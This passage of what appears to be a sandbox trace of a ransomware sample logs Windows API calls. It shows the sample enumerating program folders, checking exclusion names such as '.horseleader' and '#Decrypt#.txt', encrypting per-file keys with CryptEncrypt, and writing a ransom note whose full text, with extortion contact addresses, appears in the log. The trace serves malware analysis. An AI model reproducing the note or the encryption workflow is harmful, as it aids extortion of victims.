hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.837] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" 
(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.838] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.838] lstrcmpiW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.838] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png") returned 110 [0251.838] StrStrIW (lpFirst="SpecialNavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.838] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.838] lstrcmpW (lpString1="SpecialNavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.838] lstrlenW (lpString=".testttjffg") returned 11 [0251.838] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.838] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f55187a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f55187a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1302, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.839] lstrcmpiW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.839] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 101 [0251.839] StrStrIW (lpFirst="SpecialNavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.839] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.839] lstrcmpW (lpString1="SpecialNavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.839] lstrlenW (lpString=".testttjffg") returned 11 [0251.839] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", 
lpSrch=".testttjffg") returned 0x0 [0251.839] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.839] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.839] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5779d7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5779d7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.840] lstrcmpiW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.840] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png") returned 107 [0251.840] StrStrIW (lpFirst="SpecialNavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.840] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.840] lstrcmpW (lpString1="SpecialNavigationUp_SelectionSubpicture.png", 
lpString2="_uninstalling_.png") returned 1 [0251.840] lstrlenW (lpString=".testttjffg") returned 11 [0251.840] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.840] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.840] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.842] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fac35, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3fac35, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4aa8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="specialoccasion.png", cAlternateFileName="")) returned 1 [0251.842] lstrcmpiW (lpString1="specialoccasion.png", lpString2="Windows") returned -1 [0251.842] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png") returned 83 [0251.842] StrStrIW (lpFirst="specialoccasion.png", lpSrch=".horseleader") returned 0x0 [0251.842] lstrcmpW 
(lpString1="specialoccasion.png", lpString2="#Decrypt#.txt") returned 1 [0251.842] lstrcmpW (lpString1="specialoccasion.png", lpString2="_uninstalling_.png") returned 1 [0251.842] lstrlenW (lpString=".testttjffg") returned 11 [0251.842] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", lpSrch=".testttjffg") returned 0x0 [0251.842] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.843] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4b9306, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4b9306, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff1c74f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1917, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemask1047.png", cAlternateFileName="")) returned 1 [0251.843] lstrcmpiW (lpString1="whitemask1047.png", lpString2="Windows") returned -1 [0251.843] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png") returned 81 [0251.843] StrStrIW (lpFirst="whitemask1047.png", lpSrch=".horseleader") returned 
0x0 [0251.843] lstrcmpW (lpString1="whitemask1047.png", lpString2="#Decrypt#.txt") returned 1 [0251.843] lstrcmpW (lpString1="whitemask1047.png", lpString2="_uninstalling_.png") returned 1 [0251.843] lstrlenW (lpString=".testttjffg") returned 11 [0251.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", lpSrch=".testttjffg") returned 0x0 [0251.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.844] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 1 [0251.844] lstrcmpiW (lpString1="whitevignette1047.png", lpString2="Windows") returned -1 [0251.844] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png") returned 85 [0251.844] StrStrIW (lpFirst="whitevignette1047.png", 
lpSrch=".horseleader") returned 0x0 [0251.844] lstrcmpW (lpString1="whitevignette1047.png", lpString2="#Decrypt#.txt") returned 1 [0251.844] lstrcmpW (lpString1="whitevignette1047.png", lpString2="_uninstalling_.png") returned 1 [0251.844] lstrlenW (lpString=".testttjffg") returned 11 [0251.844] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", lpSrch=".testttjffg") returned 0x0 [0251.844] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.844] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.845] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f46d04c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f46d04c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x296fa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitevignette1047.png", cAlternateFileName="")) returned 0 [0251.845] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.846] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\#Decrypt#.txt") returned 77 [0251.846] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.847] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.847] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.849] lstrlenA (lpString="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") returned 1368 [0251.849] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.849] CloseHandle (hObject=0x158) returned 1 [0251.849] GetProcessHeap () returned 0x780000 [0251.849] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.849] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Sports", cAlternateFileName="")) returned 1 [0251.849] lstrcmpiW (lpString1="Sports", lpString2="Windows") returned -1 [0251.849] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 54 [0251.849] lstrcmpW (lpString1="Sports", lpString2=".") returned 1 [0251.849] lstrcmpW (lpString1="Sports", lpString2="..") returned 1 [0251.850] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.850] GetProcessHeap () returned 0x780000 [0251.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7dc820 [0251.850] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*") returned 56 [0251.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.852] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.852] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\.") returned 56 [0251.852] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.852] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fdc8b88, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa0e2d73a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.852] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.852] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\..") returned 57 [0251.852] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.853] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ead378, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ead378, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb5e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="CircleSubpicture.png", cAlternateFileName="")) returned 1 [0251.853] lstrcmpiW (lpString1="CircleSubpicture.png", lpString2="Windows") returned -1 [0251.853] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png") returned 75 [0251.853] StrStrIW (lpFirst="CircleSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.853] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.853] lstrcmpW (lpString1="CircleSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.853] lstrlenW (lpString=".testttjffg") returned 11 [0251.853] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.853] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.853] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.853] FindNextFileW 
(in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ed34d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71ed34d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x120d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="GoldRing.png", cAlternateFileName="")) returned 1 [0251.854] lstrcmpiW (lpString1="GoldRing.png", lpString2="Windows") returned -1 [0251.854] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png") returned 67 [0251.854] StrStrIW (lpFirst="GoldRing.png", lpSrch=".horseleader") returned 0x0 [0251.854] lstrcmpW (lpString1="GoldRing.png", lpString2="#Decrypt#.txt") returned 1 [0251.854] lstrcmpW (lpString1="GoldRing.png", lpString2="_uninstalling_.png") returned 1 [0251.854] lstrlenW (lpString=".testttjffg") returned 11 [0251.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png", lpSrch=".testttjffg") returned 0x0 [0251.854] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.854] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.855] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71338a7f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71338a7f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff428ad, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d3c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0251.855] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0251.855] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png") returned 68 [0251.855] StrStrIW (lpFirst="highlight.png", lpSrch=".horseleader") returned 0x0 [0251.855] lstrcmpW (lpString1="highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.856] lstrcmpW (lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.856] lstrlenW (lpString=".testttjffg") returned 11 [0251.856] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 